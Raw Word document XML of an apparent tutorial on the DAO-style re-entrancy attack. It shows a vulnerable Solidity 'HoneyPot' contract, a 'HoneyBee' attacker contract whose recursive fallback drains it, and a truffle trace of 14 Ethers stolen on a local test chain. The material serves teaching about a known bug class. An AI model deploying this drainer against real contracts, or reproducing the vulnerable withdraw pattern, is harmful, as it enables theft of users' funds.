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D328D" w:rsidRDefault="00656DCA" w:rsidP="0054731B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>DAO</w:t>
      </w:r>
      <w:r w:rsidR="0054731B">
        <w:t xml:space="preserve"> Smart Contract Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD328D" w:rsidRDefault="00FD328D"/>
    <w:p w:rsidR="00AB2B22" w:rsidRDefault="00194157" w:rsidP="00194157">
      <w:r>
        <w:t>By Sebastian L.K. Ma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1657A" w:rsidRDefault="00B1657A" w:rsidP="00194157"/>
    <w:p w:rsidR="00B1657A" w:rsidRDefault="00B1657A" w:rsidP="00194157">
      <w:r>
        <w:t xml:space="preserve">Below </w:t>
      </w:r>
      <w:r w:rsidR="00656DCA">
        <w:t xml:space="preserve">illustrates an DAO attack on a Smart Contract’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00656DCA">
        <w:t>re-entrancy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00656DCA">
        <w:t xml:space="preserve"> weakness.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C5445E" w:rsidRDefault="00C5445E" w:rsidP="00194157">
      <w:r>
        <w:t>Does anyone remember the SQL Injection attack ?</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00B60282" w:rsidRDefault="00656DCA">
      <w:r>
        <w:object w:dxaOrig="1063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315.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.15" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1573889778" r:id="rId6"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="008271D2" w:rsidRDefault="008271D2"/>
    <w:p w:rsidR="008271D2" w:rsidRDefault="008C7AA0" w:rsidP="008271D2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Victim deploys </w:t>
      </w:r>
      <w:r w:rsidR="00CC2AB0">
        <w:t>smart</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contract</w:t>
      </w:r>
      <w:r w:rsidR="00CC2AB0">
        <w:t xml:space="preserve"> on Ethereum public blockchain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008271D2" w:rsidRDefault="008271D2"/>
    <w:p w:rsidR="00CC2AB0" w:rsidRDefault="00CC2AB0">
      <w:r>
        <w:t xml:space="preserve">This Smart Contract is for his customers to deposit or withdraw fixed amount of Ethers using the deposit() or withdraw() functions respectively. A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DApp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> would be created for this purpos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56"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B3C57" w:rsidTr="004B3C57">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8856" w:type="dxa"/>
          </w:tcPr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contract </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C53760">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>HoneyPot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mappin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(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address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=&gt; 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uint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 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balances;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function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C53760">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>HoneyPot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C53760"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()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ayable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r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>deposit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();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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>resetWithdrawCount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();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}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/ Stores sender's value to balances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lastRenderedPageBreak/>
              <w:t xml:space="preserve">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function </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>deposit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()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ayable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{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balances[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sender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]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=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valu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;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}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/ This function has a serious re-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="608B4E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>retrant</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="608B4E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> bug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function </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>withdraw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()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if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(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!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sender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call.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>valu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(balances[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sender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])()) {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    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>revert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();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}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balances[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sender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]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=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B5CEA8"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>0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;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}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CC2AB0" w:rsidRDefault="00CC2AB0" w:rsidP="00CC2AB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>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004B3C57" w:rsidRDefault="004B3C57"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008C7AA0" w:rsidRDefault="008C7AA0" w:rsidP="00F149BE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00226D37" w:rsidRDefault="00226D37">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60282" w:rsidRDefault="00B60282"/>
    <w:p w:rsidR="00FD328D" w:rsidRDefault="008C7AA0" w:rsidP="002C17AD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidR="00CC2AB0">
        <w:t xml:space="preserve"> scans the Ethereum public blockchain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00250C6B" w:rsidRDefault="00CC2AB0" w:rsidP="00437919">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Found </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C53760">
        <w:t>HoneyPot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C53760">
        <w:t xml:space="preserve"> contract and writes a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C53760">
        <w:t>HoneyBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C53760">
        <w:t xml:space="preserve"> contract attack and steal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C53760">
        <w:t>HoneyPot’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C53760">
        <w:t xml:space="preserve"> Ether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56"/>
      </w:tblGrid>
      <w:tr w:rsidR="00250C6B" w:rsidTr="00250C6B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8856" w:type="dxa"/>
          </w:tcPr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contract </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>HoneyBe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ReenHoneyPotrant</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 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victim;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the contract instance I want to attack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/ Constructor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function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>HoneyBe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(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address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_address)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victim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=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4EC9B0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>HoneyPot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(_address);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}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/ Destroy this contract instance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function </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>kill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()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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>selfdestruct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(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sender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);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Caller will get back all the balance from this contract instance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}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/ Attacker just provide a small amount to this function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/ The victim's balance will drained recursively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 xml:space="preserve">function </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>attack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()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ayable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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>victim.deposit.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>valu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(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valu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)();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sender/attacker can deposit a small amount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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>victim.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>withdraw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();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victim's withdraw function is not re-entrant safe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               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below fallback will be invoked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}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function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()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ublic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payable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{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This fallback will be recursively called by invoking the victim's withdraw() function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To prevent infinite recursive stack-overflow or out of gas,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r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="608B4E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>// my stop condition is when victim's balance is less than my attacking amount.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if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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>victim.balanc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r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C586C0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&gt;=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Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>value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) {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    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>victim.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>withdraw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>();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    }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 xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53760" w:rsidRDefault="00C53760" w:rsidP="00C53760">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
              <w:spacing w:line="285" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00250C6B" w:rsidRPr="00250C6B" w:rsidRDefault="00250C6B" w:rsidP="00250C6B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</w:tr>
    </w:tbl>
    <w:p w:rsidR="00AB2B22" w:rsidRDefault="00AB2B22" w:rsidP="00AB2B22">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00250C6B" w:rsidRDefault="00250C6B" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00437919" w:rsidRDefault="00A57128" w:rsidP="002C17AD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Trace of Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B382D" w:rsidRDefault="000B382D" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left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56"/>
      </w:tblGrid>
      <w:tr w:rsidR="00437919" w:rsidTr="005B7B0C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8856" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TRACE- Reentrant and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ReentrantAttacker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00A0529E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>var</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> honey; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>HoneyPot.deployed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>().then(function(deployed){honey=deployed;});</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00A0529E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00A0529E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tReentrantAttackerFailed.deployed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">().then(instance =&gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>evilContract</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>instance.address</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00A0529E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>'0x75c35c980c0d37ef46df04d31a140b65503c0eed'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00A0529E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>truffle(develop)&gt; web3.eth.getBalance('0x75c35c980c0d37ef46df04d31a140b65503c0eed').toString(10)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00A0529E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>'0'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00A0529E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>// assign the attacker</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00A0529E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pP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noMoneyNoHoney</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ReentrantAttackerFailed.deployed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">().then(function(deployed){ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>noMoneyNoHoney</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> =deployed;});</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A0529E" w:rsidRDefault="00A0529E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00F42A21" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A customer deposit </w:t>
            </w:r>
            <w:r w:rsidR="00173E7E">
              <w:t>has 15</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Ethers into </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>HoneyPot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00F42A21" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>honey</w:t>
            </w:r>
            <w:r w:rsidR="00173E7E">
              <w:t>.deposit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00173E7E">
              <w:t>({from: web3.eth.accounts[1], value: web3.toWei(15, "ether") }))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F42A21" w:rsidRDefault="00F42A21" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Check </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>HoneyPot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> balance</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> web3.eth.getBalance('0x9fbda871d559710256a2502a2517b794b482db40').toString(10)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>'15000000000000000000'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F42A21" w:rsidRDefault="00F42A21" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F42A21" w:rsidRDefault="00F42A21" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>Check Attacker balance</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>web3.eth.getBalance('0x30753e4a8aad7f8597332e813735def5dd395028').toString(10)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>'0'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F42A21" w:rsidRDefault="00F42A21" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>Attacker attacks with 2</w:t>
            </w:r>
            <w:r w:rsidR="00F42A21">
              <w:t xml:space="preserve"> Ethers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00F42A21" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>noMoneyNoHoney</w:t>
            </w:r>
            <w:r w:rsidR="00173E7E">
              <w:t>.attack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00173E7E">
              <w:t>({ value: web3.toWei(2, "ether") })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8625"/>
            </w:tblGrid>
            <w:tr w:rsidR="001B7549" w:rsidTr="001B7549">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8625" w:type="dxa"/>
                </w:tcPr>
                <w:p w:rsidR="001B7549" w:rsidRDefault="001B7549" w:rsidP="001B7549">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:ind w:left="0"/>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:t>ReentrantAttacker</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:t xml:space="preserve">             </w:t>
                  </w:r>
                  <w:r w:rsidR="009C2A4D">
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:t xml:space="preserve">Reentrant      </w:t>
                  </w:r>
                  <w:r w:rsidR="009C2A4D">
                    <w:t xml:space="preserve">   </w:t>
                  </w:r>
                  <w:r>
                    <w:t>15 Ethers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 xml:space="preserve">                                  -2     </w:t>
                  </w:r>
                  <w:r w:rsidR="009C2A4D">
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:t xml:space="preserve">deposit()  </w:t>
                  </w:r>
                  <w:r w:rsidR="009C2A4D">
                    <w:t xml:space="preserve">  </w:t>
                  </w:r>
                  <w:r>
                    <w:t xml:space="preserve">+2  17        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 xml:space="preserve">                                  +2    </w:t>
                  </w:r>
                  <w:r w:rsidR="009C2A4D">
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:t>withdraw() -2  15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>fallback() 15&gt;=2       +2     withdraw() -2  13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>fallback() 13&gt;=2       +2     withdraw() -2  11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>fallback() 11&gt;=2       +2     withdraw() -2  9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>fallback() 9&gt;=2         +2     withdraw() -2  7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>fallback() 7&gt;=2         +2     withdraw() -2  5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>fallback() 5&gt;=2         +2     withdraw() -2  3</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="001B7549" w:rsidRDefault="001B7549" w:rsidP="001B7549">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:ind w:left="0"/>
                  </w:pPr>
                  <w:r>
                    <w:t>fallback() 3&gt;=2         +2     withdraw() -2  1</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="001B7549" w:rsidRDefault="001B7549" w:rsidP="00173E7E">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:ind w:left="0"/>
                  </w:pPr>
                  <w:r>
                    <w:t>fallback() 1 ! (&gt;=2)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F42A21" w:rsidRDefault="00F42A21" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>Attacker has stolen 14 Ethers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
